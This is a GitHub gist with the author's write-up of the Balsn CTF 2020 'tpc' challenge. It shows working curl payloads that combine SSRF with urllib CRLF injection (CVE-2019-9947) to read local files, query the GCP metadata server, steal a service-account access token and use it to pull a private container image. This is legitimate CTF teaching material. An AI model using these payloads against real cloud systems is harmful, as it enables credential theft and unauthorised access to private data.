Skip to content

Instantly share code, notes, and snippets.

@YSc21
Created November 27, 2020 14:25
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save YSc21/e5471285145cc5d34fe53c7d67a3d8f3 to your computer and use it in GitHub Desktop.
Save YSc21/e5471285145cc5d34fe53c7d67a3d8f3 to your computer and use it in GitHub Desktop.
Balsn CTF 2020 - tpc

TPC

Flag is in the working directory

http://35.194.175.80:8000

update: You don't need to use fuzzing tools to guess file names, The flag file name is unguessable.

Author: ysc

There are 4 things you need to do:

  • Recon: Find the reqeust is sent by Python 3.7 urllib and find CVE-2019-9947 which is Python urllib CRLF vulnerability
  • Recon: Find the website is deployed on Google Cloud Platform (GCP)
  • Dump info: Get permission scopes and token from GCP metadata server
  • Pull image and read flag

Recon: Python 3.7 urllib

In this challenge, you only get a message:

/query?site=[your website]

I think you quickly found it's SSRF and try to query internal IPs/ports/files, nice try ;)

You can use SSRF to get source code and find that it's Python urllib (ref: Super-Guesser's writeup). If you send a request to your website (e.g. http://35.194.175.80:8000/query?site=https://hookb.in/JKmqjg2OKRuJPPWVoZVr), you will find the python version in user-agent: Python-urllib/3.7.

After you survey urllib, you will find CVE-2019-9947 which is CRLF vulnerability and it works in this challenge!

Recon: Google Cloud Platform (GCP)

But only CRLF vulnerability can't read flag. If you read /etc/hosts (by http://35.194.175.80:8000/query?site=file:///etc/hosts) or whois 35.194.175.80, you will find the challenge is deployed on GCP.

GCP has metadata server which can do something if it has permissions (e.g. get more instance's information, RCE, control GCP service, ... etc).

If you send request to GCP metadata server by http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1beta1/ or v0.1 API endpoint, you will get Internal Server Error.

Because v1beta1 server and v0.1 metadata server endpoints are deprecated and scheduled for shutdown (You can find this information in GCP metadata document). Note that v1beta1 and v0.1 API were not deprecated when I built the challenge, so I disable v1beta1 and v0.1 API by adding disable-legacy-endpoints=TRUE in GCP metadata.

Now only v1 metadata server works on GCP but you need to provide the header Metadata-Flavor: Google in request to query v1 metadata server.

But wait, remember that we have CRLF vulnerability? We can use SSRF + CRLF to query GCP metadata server!

Dump info: GCP metadata

Here is a example to query GCP metadata:

curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'

After you recon, you will find that it's deployed by Compute Engine with a container:

$ curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/attributes/gce-container-declaration%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'
spec:
  containers:
    - name: tpc-1
      image: 'asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14'
      stdin: false
      tty: false
  restartPolicy: Always

# This container declaration format is not public API and may change without notice. Please
# use gcloud command-line tool or Google Cloud Console to run Containers on Google Compute Engine.

Oh, Your image is on Google Container Registry (GCR) and the repository is asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14, but can I have permission to pull images?

$ curl 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append

Yes you can! If you test the service account permission of the instance, the service account has devstorage.read_only permission so it can download all private images on GCR!

Pull image and get flag

Now you can use these commands to download image:

IMAGE=asia.gcr.io/balsn-ctf-2020-tpc/tpc:v3.14
TOKEN=$(curl -s 'http://35.194.175.80:8000/query?site=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token%20HTTP%2F1.1%0D%0AMetadata-Flavor:%20Google%0D%0Aa:%20' | jq -r '.access_token')

docker login -u oauth2accesstoken -p "$TOKEN" https://asia.gcr.io
docker pull $IMAGE
docker run -it --rm --entrypoint /bin/sh $IMAGE

# /opt/workdir $ ls
# docker-entrypoint-dc1e2f5f7a4f359bb5ce1317a.sh  main-dc1e2f5f7a4f359bb5ce1317a.py  flag-6ba72dc9ffb518f5bcd92eee.txt  requirements.txt
# /opt/workdir $ cat flag-6ba72dc9ffb518f5bcd92eee.txt
# BALSN{What_permissions_does_the_service_account_need}
# /opt/workdir $ exit

docker logout asia.gcr.io

Hope you enjoy downloading images by GCP token :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment